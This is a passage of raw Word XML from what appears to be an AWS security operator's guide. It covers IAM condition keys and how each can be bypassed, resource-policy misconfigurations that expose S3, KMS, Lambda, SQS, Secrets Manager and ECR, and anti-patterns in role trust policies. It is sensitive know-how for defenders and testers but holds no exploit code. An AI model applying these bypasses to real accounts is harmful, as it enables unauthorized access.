                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="477751F9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D2318F9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>aws:MultiFactorAuthPresent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3681CA05"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Require MFA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C2FF92F"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Does not apply to role sessions without session-context; easily bypassed on role-chained sessions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="6198AF9F" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47908563" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>sts:ExternalId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E5A0F32"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Confused-deputy control on cross-account AssumeRole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="300597AE"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If absent or predictable, the role is confused-deputy vulnerable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="15DA9A05" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3996568E" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>aws:ResourceTag/&lt;key&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57835FB9"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Tag-based access control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65FC29C0"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If the principal can create or retag resources, they escape the tag scope.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="5126CA61" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E538189" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>aws:RequestTag/&lt;key&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="649D6F29"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Require tag on creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="06BE649F"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Tag-injection vulnerabilities across services that share tags.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00000000" w14:paraId="6E058C79" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="582EC1EE" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>aws:PrincipalTag/&lt;key&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14D2A75F"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Tag-based ABAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcMar>
              <w:top w:w="84" w:type="dxa"/>
              <w:left w:w="132" w:type="dxa"/>
              <w:bottom w:w="84" w:type="dxa"/>
              <w:right w:w="132" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="706BAE2B" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
            <w:pPr>
              <w:spacing w:before="216" w:after="216"/>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">If </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>sts:TagSession</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> is allowed, caller can assign their own tag.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="65EAEAAD" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="1136413339"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>OPERATOR NOTE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0039DE45" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="1136413339"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">Read every condition block with one question: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>does the principal I control the inputs for pass this check?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the condition is on a tag that you can set on yourself, on an IP that you can source-route through a service, or on an ExternalId that is guessable from public documentation, the condition is decorative.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4710B45D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>7.6  Resource policy surface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E42F9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Every service with a resource-based policy is a potential back door:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B01EFD2"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S3 bucket policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Principal: "*"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Action: s3:GetObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> makes the bucket world-readable. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Principal: "*"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Action: s3:*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a worldwide bucket takeover primitive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="745A27D3"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KMS key policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> If the key policy allows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kms:Decrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Principal: "*"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, anyone can use the key to decrypt; combined with a bucket policy that allows </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:GetObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on SSE-KMS-encrypted objects, a world-readable bucket is truly world-readable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B6B001"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Lambda resource policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> The "invoke policy" attached via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>lambda:AddPermission</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Principal: "*"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows anyone with access to the ARN to invoke the function. Many Lambda URL misconfigurations are this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188AF500"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SNS access policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Controls who can publish and subscribe. Misconfigurations allow arbitrary third-party accounts to flood topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E5C44A"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SQS access policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Same pattern; widely open SQS queues act as ingress bus into downstream Lambda triggers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA802B3"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Secrets Manager resource policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Who can </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>GetSecretValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>. Over-permissive resource policy lets cross-account principals read secrets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7C9998"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ECR repository policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Who can pull images. An over-permissive ECR policy lets attackers who have </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>not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compromised the account pull production images and analyze them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391D2CC4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>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Glue resource policy.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Who can read Glue Data Catalog. Often overlooked; contains column-level metadata that reveals schema of production data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4B3F29" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>7.7  Role trust policies revisited</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C2C73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role trust policy is a special kind of resource policy that lists which principals can call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>sts:AssumeRole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the role. Three anti-patterns operators find repeatedly:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6128BF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 xml:space="preserve">Principal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with no Condition.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> Total takeover. Any AWS account can assume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D65282F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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 xml:space="preserve">Principal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with only </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>StringLike</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a PrincipalArn pattern.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> As in Chapter 5's example — an attacker creates a matching role name in their own account and satisfies the pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC39C92" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>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 xml:space="preserve">Principal </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>{"Service": "ec2.amazonaws.com"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with no Condition.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
